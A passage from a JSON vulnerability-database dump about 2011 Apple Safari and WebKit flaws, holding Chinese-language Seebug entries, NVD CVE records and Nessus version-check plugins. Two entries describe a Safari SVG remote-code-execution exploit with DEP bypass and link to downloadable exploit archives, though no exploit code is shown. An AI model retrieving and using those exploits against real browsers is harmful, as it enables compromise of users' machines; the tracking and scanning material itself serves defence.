10.x\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nApple\r\n-----\r\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\n\r\nhttp://support.apple.com/", "modified": "2011-10-13T00:00:00", "published": "2011-10-13T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-21013", "id": "SSV:21013", "title": "Apple iTunes\u591a\u4e2a\u5b89\u5168\u6f0f\u6d1e", "type": "seebug", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": ""}, {"lastseen": "2017-11-19T18:01:52", "bulletinFamily": "exploit", "description": "Bugtraq ID: 48832\r\nCVE ID\uff1aCVE-2011-0216\r\n\r\nApple Safari\u662f\u4e00\u6b3e\u6d41\u884c\u7684WEB\u6d4f\u89c8\u5668\u3002\r\nApple Safari\u4f7f\u7528\u7684libxml\u5904\u7406XML\u6570\u636e\u65f6\u5b58\u5728\u4e00\u4e2a\u5355\u5b57\u8282\u5806\u7f13\u51b2\u533a\u6ea2\u51fa\uff0c\u67e5\u770b\u7279\u5236\u7684WEB\u7ad9\u70b9\u53ef\u5bfc\u81f4\u5e94\u7528\u7a0b\u5e8f\u5d29\u6e83\u6216\u53ef\u80fd\u4ee5\u5e94\u7528\u7a0b\u5e8f\u4e0a\u4e0b\u6587\u6267\u884c\u4efb\u610f\u4ee3\u7801\u3002\n\nApple Safari 4.1.2 for Windows\r\n Apple Safari 4.0.5 for Windows\r\n Apple Safari 4.0.5\r\n Apple Safari 4.0.4 for Windows\r\n Apple Safari 4.0.4\r\n Apple Safari 4.0.3 for Windows\r\n Apple Safari 4.0.3\r\n Apple Safari 4.0.2 for Windows\r\n Apple Safari 4.0.2\r\n Apple Safari 4.0.1\r\n Apple Safari 5.0.5 for Windows\r\n Apple Safari 5.0.5\r\n Apple Safari 5.0.4 for Windows\r\n Apple Safari 5.0.4\r\n Apple Safari 5.0.3 for Windows\r\n Apple Safari 5.0.3\r\n Apple Safari 5.0.2 for Windows\r\n Apple Safari 5.0.2\r\n Apple Safari 5.0.1 for Windows\r\n Apple Safari 5.0.1\r\n Apple Safari 5.0 for Windows\r\n Apple Safari 5.0\r\n Apple Safari 4.1.3 for Windows\r\n Apple Safari 4.1.3\r\n Apple Safari 4.1.2\r\n Apple Safari 4.1.1\r\n Apple Safari 4.1\r\n Apple Safari 4.0 Beta\r\n Apple Safari 4.0\n\u5382\u5546\u89e3\u51b3\u65b9\u6848\r\nApple Safari 5.0.6\u548c5.1\u5df2\u7ecf\u4fee\u590d\u6b64\u6f0f\u6d1e\uff0c\u5efa\u8bae\u7528\u6237\u4e0b\u8f7d\u4f7f\u7528\uff1a\r\nhttp://www.apple.com/safari/download/", "modified": "2011-07-25T00:00:00", "published": "2011-07-25T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-20762", "id": "SSV:20762", "title": "Apple Safari 'libxml'\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e", "type": "seebug", "sourceData": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": ""}, {"lastseen": "2017-11-19T17:56:47", "bulletinFamily": "exploit", "description": "BUGTRAQ ID: 48832\r\nCVE ID: CVE-2011-0216\r\n\r\nSafari\u662f\u82f9\u679c\u8ba1\u7b97\u673a\u7684\u6700\u65b0\u4f5c\u4e1a\u7cfb\u7edfMac OS X\u4e2d\u7684\u6d4f\u89c8\u5668\uff0c\u4f7f\u7528\u4e86KDE\u7684KHTML\u4f5c\u4e3a\u6d4f\u89c8\u5668\u7684\u8fd0\u7b97\u6838\u5fc3\u3002\r\n\r\nSafari 5.0.6\u4e4b\u524d\u7248\u672c\u5728libxml\u7684\u5b9e\u73b0\u4e0a\u5b58\u5728\u5355\u5b57\u8282\u6ea2\u51fa\u6f0f\u6d1e\uff0c\u653b\u51fb\u8005\u53ef\u5229\u7528\u6b64\u6f0f\u6d1e\u5728\u53d7\u5f71\u54cd\u5e94\u7528\u7a0b\u5e8f\u4e0b\u6267\u884c\u4efb\u610f\u4ee3\u7801\u6216\u9020\u6210\u62d2\u7edd\u670d\u52a1\u3002\n\nApple Safari 5.x\r\nApple Safari 4.x\r\nApple TV 4.3\r\nApple TV 4.2\r\nApple TV 4.1\r\nApple TV 4.0\r\nApple TV 2.1\r\nApple TV 1.0\r\nApple iOS 4.x\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nApple\r\n-----\r\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\n\r\nhttp://support.apple.com/", "modified": "2011-12-08T00:00:00", "published": "2011-12-08T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-26024", "id": "SSV:26024", "type": "seebug", "title": "Apple Safari "libxml"\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e", "sourceData": "", "sourceHref": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T18:01:40", "bulletinFamily": "exploit", "description": "No description provided by source.", "modified": "2011-07-26T00:00:00", "published": "2011-07-26T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-20768", "id": "SSV:20768", "title": "Safari SVG DOM processing PoC", "type": "seebug", "sourceData": "\n /*\r\n# Exploit Title: CVE-2011-0222 Safari SVG DOM processing PoC\r\n# Date: 2011-07-25\r\n# Author: Nikita Tarakanov (CISS Research Team), Alex Bazhanyuk (CISS Research Team)\r\n# Software Link: http://www.apple.com/au/safari/download/\r\n# Version: prior to 5.0.6, 5.1\r\n# Tested on: Win XP SP3, Win 7 SP1\r\n# CVE : CVE-2011-0222\r\n# Status : Patched\r\n*/\r\n \r\nPoC: http://www.exploit-db.com/sploits/CVE-2011-0222.zip\r\nhttp://sebug.net/paper/Exploits-Archives/2011-exploits/CVE-2011-0222.zip\n ", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-20768"}, {"lastseen": "2017-11-19T18:01:46", "bulletinFamily": "exploit", "description": "No description provided by source.", "modified": "2011-07-27T00:00:00", "published": "2011-07-27T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-20769", "id": "SSV:20769", "title": "Safari 5.0.5 SVG Remote Code Execution Exploit (DEP bypass)", "type": "seebug", "sourceData": "\n Abysssec Public Advisory\r\n \r\n apple killed one of our 0day no point to keep it private anymore :(\r\n there is another version of exploit using POPup and thats more\r\nreliable but as you know safari block pop up by default so we found a\r\ncool way to bypass it and stand alone module .\r\n this exploiting using ROP to bypass permanent DEP.\r\n \r\n note : Change spray range if not work on your machine.\r\n \r\n CVE-2011-0222 :\r\n \r\n WebKit, as used in Apple Safari before 5.0.6, allows remote attackers\r\nto execute arbitrary code or cause a denial of service (memory\r\ncorruption and application crash)\r\n via a crafted web site a different vulnerability than other WebKit\r\nCVEs listed in APPLE-SA-2011-07-20-1.\r\n \r\n Tested on windows XP SP3 and safari 5.0.5\r\n \r\n feel free to contact us at : info [at] abysssec.com\r\n \r\n and follow @abysssec for updates\r\n \r\n http://www.abysssec.com/files/CVE-2011-0222_WinXP_Exploit.zip\r\n http://www.exploit-db.com/sploits/CVE-2011-0222_WinXP_Exploit.zip\n ", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-20769"}, {"lastseen": "2017-11-19T18:01:41", "bulletinFamily": "exploit", "description": "Bugtraq ID: 48839\r\nCVE ID\uff1aCVE-2011-0217\r\n\r\nApple Safari\u662f\u4e00\u6b3e\u6d41\u884c\u7684WEB\u6d4f\u89c8\u5668\u3002\r\nSafari\u6d4f\u89c8\u5668\u7684"AutoFill web forms"\u529f\u80fd\u53ef\u586b\u5145\u4e0d\u53ef\u89c1\u8868\u5355\u5b57\u6bb5\uff0c\u5728\u7528\u6237\u63d0\u4ea4\u8868\u5355\u4e4b\u524d\u7ad9\u4e0a\u7684\u811a\u672c\u53ef\u8bbf\u95ee\u8fd9\u4e9b\u4fe1\u606f\u3002\n\nApple Safari 5.0.5 for Windows\r\n Apple Safari 5.0.5\r\n Apple Safari 5.0.4 for Windows\r\n Apple Safari 5.0.4\r\n Apple Safari 5.0.3 for Windows\r\n Apple Safari 5.0.3\r\n Apple Safari 5.0.2 for Windows\r\n Apple Safari 5.0.2\r\n Apple Safari 5.0.1 for Windows\r\n Apple Safari 5.0.1\r\n Apple Safari 5.0 for Windows\r\n Apple Safari 5.0\n\u5382\u5546\u89e3\u51b3\u65b9\u6848\r\nApple Safari 5.0.6\u548c5.1\u5df2\u7ecf\u4fee\u590d\u6b64\u6f0f\u6d1e\uff0c\u5efa\u8bae\u7528\u6237\u4e0b\u8f7d\u4f7f\u7528\uff1a\r\nhttp://www.apple.com/safari/download/", "modified": "2011-07-25T00:00:00", "published": "2011-07-25T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-20761", "id": "SSV:20761", "title": "Apple Safari 'AutoFill web forms'\u529f\u80fd\u4fe1\u606f\u6cc4\u9732\u6f0f\u6d1e", "type": "seebug", "sourceData": "", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": ""}], "cve": [{"lastseen": "2019-05-29T18:11:10", "bulletinFamily": "NVD", "description": "WebKit, as used in Apple Safari before 5.0.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2011-07-20-1.", "modified": "2011-10-21T02:53:00", "id": "CVE-2011-1453", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-1453", "published": "2011-07-21T23:55:00", "title": "CVE-2011-1453", "type": "cve", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:11:10", "bulletinFamily": "NVD", "description": "WebKit, as used in Apple Safari before 5.0.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2011-07-20-1.", "modified": "2011-10-21T02:53:00", "id": "CVE-2011-1462", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-1462", "published": "2011-07-21T23:55:00", "title": "CVE-2011-1462", "type": "cve", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:11:05", "bulletinFamily": "NVD", "description": "WebKit, as used in Apple Safari before 5.0.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2011-07-20-1.", "modified": "2011-10-21T02:51:00", "id": "CVE-2011-0234", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-0234", "published": "2011-07-21T23:55:00", "title": "CVE-2011-0234", "type": "cve", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:11:05", "bulletinFamily": "NVD", "description": "WebKit, as used in Apple Safari before 5.0.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2011-07-20-1.", "modified": "2011-10-21T02:51:00", "id": "CVE-2011-0233", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-0233", "published": "2011-07-21T23:55:00", "title": "CVE-2011-0233", "type": "cve", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:11:10", "bulletinFamily": "NVD", "description": "WebKit, as used in Apple Safari before 5.0.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2011-07-20-1.", "modified": "2011-10-21T02:53:00", "id": "CVE-2011-1457", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-1457", "published": "2011-07-21T23:55:00", "title": "CVE-2011-1457", "type": "cve", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:11:08", "bulletinFamily": "NVD", "description": "WebKit, as used in Apple Safari before 5.0.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2011-07-20-1.", "modified": "2011-10-21T02:53:00", "id": "CVE-2011-1288", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-1288", "published": "2011-07-21T23:55:00", "title": "CVE-2011-1288", "type": "cve", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:11:05", "bulletinFamily": "NVD", "description": "Apple Safari before 5.0.6 allows remote attackers to bypass the Same Origin Policy, and modify the rendering of text from arbitrary web sites, via a Java applet that loads fonts.", "modified": "2011-07-22T04:00:00", "id": "CVE-2011-0219", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-0219", "published": "2011-07-21T23:55:00", "title": "CVE-2011-0219", "type": "cve", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2019-05-29T18:11:05", "bulletinFamily": "NVD", "description": "WebKit, as used in Apple Safari before 5.0.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2011-07-20-1.", "modified": "2011-10-14T02:50:00", "id": "CVE-2011-0253", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-0253", "published": "2011-07-21T23:55:00", "title": "CVE-2011-0253", "type": "cve", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:11:05", "bulletinFamily": "NVD", "description": "WebKit, as used in Apple Safari before 5.0.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2011-07-20-1.", "modified": "2011-10-21T02:51:00", "id": "CVE-2011-0225", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-0225", "published": "2011-07-21T23:55:00", "title": "CVE-2011-0225", "type": "cve", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:11:05", "bulletinFamily": "NVD", "description": "Cross-site scripting (XSS) vulnerability in WebKit in Apple Safari before 5.0.6 allows remote attackers to inject arbitrary web script or HTML via vectors involving a URL that contains a username.", "modified": "2011-10-21T02:51:00", "id": "CVE-2011-0242", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-0242", "published": "2011-07-21T23:55:00", "title": "CVE-2011-0242", "type": "cve", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "nessus": [{"lastseen": "2019-11-01T02:49:59", "bulletinFamily": "scanner", "description": "The version of Apple Safari installed on the remote macOS or Mac OS X\nhost is prior to 11.1. It is, therefore, affected by multiple\nvulnerabilities as described in the HT4808 security advisory.", "modified": "2019-11-02T00:00:00", "id": "MACOSX_SAFARI5_1.NASL", "href": "https://www.tenable.com/plugins/nessus/55638", "published": "2011-07-21T00:00:00", "title": "Mac OS X : Apple Safari < 5.1 / 5.0.6", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(55638);\n script_version(\"1.47\");\n script_cvs_date(\"Date: 2019/07/03 12:01:40\");\n\n script_cve_id(\n \"CVE-2010-1383\",\n \"CVE-2010-1420\",\n \"CVE-2010-1823\",\n \"CVE-2010-3829\",\n \"CVE-2011-0164\",\n \"CVE-2011-0195\",\n \"CVE-2011-0200\",\n \"CVE-2011-0201\",\n \"CVE-2011-0202\",\n \"CVE-2011-0204\",\n \"CVE-2011-0206\",\n \"CVE-2011-0214\",\n \"CVE-2011-0215\",\n \"CVE-2011-0216\",\n \"CVE-2011-0217\",\n \"CVE-2011-0218\",\n \"CVE-2011-0219\",\n \"CVE-2011-0221\",\n \"CVE-2011-0222\",\n \"CVE-2011-0223\",\n \"CVE-2011-0225\",\n \"CVE-2011-0232\",\n \"CVE-2011-0233\",\n \"CVE-2011-0234\",\n \"CVE-2011-0235\",\n \"CVE-2011-0237\",\n \"CVE-2011-0238\",\n \"CVE-2011-0240\",\n \"CVE-2011-0241\",\n \"CVE-2011-0242\",\n \"CVE-2011-0244\",\n \"CVE-2011-0253\",\n \"CVE-2011-0254\",\n \"CVE-2011-0255\",\n \"CVE-2011-0981\",\n \"CVE-2011-0983\",\n \"CVE-2011-1107\",\n \"CVE-2011-1109\",\n \"CVE-2011-1114\",\n \"CVE-2011-1115\",\n \"CVE-2011-1117\",\n \"CVE-2011-1121\",\n \"CVE-2011-1188\",\n \"CVE-2011-1190\",\n \"CVE-2011-1203\",\n \"CVE-2011-1204\",\n \"CVE-2011-1288\",\n \"CVE-2011-1293\",\n \"CVE-2011-1295\",\n \"CVE-2011-1296\",\n \"CVE-2011-1449\",\n \"CVE-2011-1451\",\n \"CVE-2011-1453\",\n \"CVE-2011-1457\",\n \"CVE-2011-1462\",\n \"CVE-2011-1774\",\n \"CVE-2011-1797\",\n \"CVE-2011-3438\",\n \"CVE-2011-3443\"\n );\n script_bugtraq_id(\n 43228,\n 45008,\n 46262,\n 46614,\n 46703,\n 46785,\n 47020,\n 47029,\n 47604,\n 47668,\n 48416,\n 48426,\n 48427,\n 48429,\n 48437,\n 48820,\n 48823,\n 48825,\n 48827,\n 48828,\n 48831,\n 48832,\n 48833,\n 48837,\n 48839,\n 48840,\n 48842,\n 48843,\n 48844,\n 48845,\n 48846,\n 48847,\n 48848,\n 48849,\n 48850,\n 48851,\n 48852,\n 48853,\n 48854,\n 48855,\n 48856,\n 48857,\n 48858,\n 48859,\n 48860,\n 51035,\n 78606\n );\n script_xref(name:\"EDB-ID\", value:\"17575\");\n script_xref(name:\"EDB-ID\", value:\"17993\");\n\n script_name(english:\"Mac OS X : Apple Safari < 5.1 / 5.0.6\");\n script_summary(english:\"Checks the Safari Version\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web browser installed on the remote macOS or Mac OS X host is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apple Safari installed on the remote macOS or Mac OS X\nhost is prior to 11.1. It is, therefore, affected by multiple\nvulnerabilities as described in the HT4808 security advisory.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://support.apple.com/kb/HT4808\");\n script_set_attribute(attribute:\"see_also\", value:\"http://lists.apple.com/archives/security-announce/2011/Jul/msg00002.html\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Apple Safari 5.1 / 5.0.6 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2010-1383\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-11-678\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apple Safari Webkit libxslt Arbitrary File Creation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'White_Phosphorus');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/07/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/07/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/07/21\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apple:safari\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:mac_os_x\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n script_copyright(english:\"This script is Copyright (C) 2011-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_apple_safari_installed.nbin\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/MacOSX/Version\", \"MacOSX/Safari/Installed\");\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nos = get_kb_item('Host/MacOSX/Version');\nif (!os) audit(AUDIT_OS_NOT, 'Mac OS X or macOS');\n\nif (!preg(pattern:\"Mac OS X 10\\.[56]([^0-9]|$)\", string:os)) audit(AUDIT_OS_NOT, 'Mac OS X 10.5 / 10.6');\n\nget_kb_item_or_exit('MacOSX/Safari/Installed', exit_code:0);\npath = get_kb_item_or_exit('MacOSX/Safari/Path', exit_code:1);\nversion = get_kb_item_or_exit('MacOSX/Safari/Version', exit_code:1);\n\nfixed_version = '5.1';\nif ('10.5' >< os) fixed_version = '5.0.5';\n\nif (ver_compare(ver:version, fix:fixed_version, strict:FALSE) == -1)\n{\n report = report_items_str(\n report_items:make_array(\n 'Path', path,\n 'Installed version', version,\n 'Fixed version', fixed_version\n ),\n ordered_fields:make_list('Path', 'Installed version', 'Fixed version')\n );\n security_report_v4(port:0, severity:SECURITY_HOLE, extra:report);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, 'Safari', version, path);", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-01T03:29:32", "bulletinFamily": "scanner", "description": "The version of Safari installed on the remote Windows host is earlier\nthan 5.1. As such, it is potentially affected by numerous issues in\nthe following components :\n\n - CFNetwork\n - ColorSync\n - CoreFoundation\n - CoreGraphics\n - International Components for Unicode\n - ImageIO\n - libxslt\n - libxml\n - Safari\n - WebKit", "modified": "2019-11-02T00:00:00", "id": "SAFARI_5_1.NASL", "href": "https://www.tenable.com/plugins/nessus/55639", "published": "2011-07-21T00:00:00", "title": "Safari < 5.1 Multiple Vulnerabilities", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(55639);\n script_version(\"1.47\");\n script_cvs_date(\"Date: 2018/07/27 18:38:15\");\n\n script_cve_id(\n \"CVE-2010-1383\",\n \"CVE-2010-1420\",\n \"CVE-2010-1823\",\n \"CVE-2010-3829\",\n \"CVE-2011-0164\",\n \"CVE-2011-0195\",\n \"CVE-2011-0200\",\n \"CVE-2011-0201\",\n \"CVE-2011-0202\",\n \"CVE-2011-0204\",\n \"CVE-2011-0206\",\n \"CVE-2011-0214\",\n \"CVE-2011-0215\",\n \"CVE-2011-0216\",\n \"CVE-2011-0217\",\n \"CVE-2011-0218\",\n \"CVE-2011-0219\",\n \"CVE-2011-0221\",\n \"CVE-2011-0222\",\n \"CVE-2011-0223\",\n \"CVE-2011-0225\",\n \"CVE-2011-0232\",\n \"CVE-2011-0233\",\n \"CVE-2011-0234\",\n \"CVE-2011-0235\",\n \"CVE-2011-0237\",\n \"CVE-2011-0238\",\n \"CVE-2011-0240\",\n \"CVE-2011-0241\",\n \"CVE-2011-0242\",\n \"CVE-2011-0244\",\n \"CVE-2011-0253\",\n \"CVE-2011-0254\",\n \"CVE-2011-0255\",\n \"CVE-2011-0981\",\n \"CVE-2011-0983\",\n \"CVE-2011-1107\",\n \"CVE-2011-1109\",\n \"CVE-2011-1114\",\n \"CVE-2011-1115\",\n \"CVE-2011-1117\",\n \"CVE-2011-1121\",\n \"CVE-2011-1188\",\n \"CVE-2011-1190\",\n \"CVE-2011-1203\",\n \"CVE-2011-1204\",\n \"CVE-2011-1288\",\n \"CVE-2011-1293\",\n \"CVE-2011-1295\",\n \"CVE-2011-1296\",\n \"CVE-2011-1449\",\n \"CVE-2011-1451\",\n \"CVE-2011-1453\",\n \"CVE-2011-1457\",\n \"CVE-2011-1462\",\n \"CVE-2011-1774\",\n \"CVE-2011-1797\",\n \"CVE-2011-3443\"\n );\n script_bugtraq_id(\n 43228,\n 46262,\n 46614,\n 46703,\n 46785,\n 47029,\n 47604,\n 47668,\n 48416,\n 48426,\n 48427,\n 48429,\n 48437,\n 48820,\n 48823,\n 48824,\n 48825,\n 48827,\n 48828,\n 48831,\n 48832,\n 48833,\n 48837,\n 48839,\n 48840,\n 48841,\n 48842,\n 48843,\n 48844,\n 48845,\n 48846,\n 48847,\n 48848,\n 48849,\n 48850,\n 48851,\n 48852,\n 48853,\n 48854,\n 48855,\n 48856,\n 48857,\n 48858,\n 48859,\n 48860\n );\n script_xref(name:\"EDB-ID\", value:\"17575\");\n script_xref(name:\"EDB-ID\", value:\"17993\");\n script_xref(name:\"MSVR\", value:\"MSVR11-009\");\n\n script_name(english:\"Safari < 5.1 Multiple Vulnerabilities\");\n script_summary(english:\"Checks Safari's version number\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote host contains a web browser that is affected by several\nvulnerabilities.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The version of Safari installed on the remote Windows host is earlier\nthan 5.1. As such, it is potentially affected by numerous issues in\nthe following components :\n\n - CFNetwork\n - ColorSync\n - CoreFoundation\n - CoreGraphics\n - International Components for Unicode\n - ImageIO\n - libxslt\n - libxml\n - Safari\n - WebKit\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"http://support.apple.com/kb/HT4808\");\n script_set_attribute(attribute:\"see_also\", value:\"http://lists.apple.com/archives/security-announce/2011/Jul/msg00002.html\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Safari 5.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-11-678\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apple Safari Webkit libxslt Arbitrary File Creation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'White_Phosphorus');\nscript_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/07/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/07/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/07/21\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apple:safari\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2011-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"safari_installed.nasl\");\n script_require_keys(\"SMB/Safari/FileVersion\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\n\nversion = get_kb_item_or_exit(\"SMB/Safari/FileVersion\");\n\nversion_ui = get_kb_item(\"SMB/Safari/ProductVersion\");\nif (isnull(version_ui)) version_ui = version;\n\nif (ver_compare(ver:version, fix:\"5.34.50.0\") == -1)\n{\n if (report_verbosity > 0)\n {\n path = get_kb_item(\"SMB/Safari/Path\");\n if (isnull(path)) path = \"n/a\";\n\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + version_ui +\n '\\n Fixed version : 5.1 (7534.50)\\n';\n security_hole(port:get_kb_item(\"SMB/transport\"), extra:report);\n }\n else security_hole(get_kb_item(\"SMB/transport\"));\n}\nelse exit(0, \"The remote host is not affected since Safari \" + version_ui + \" is installed.\");\n", 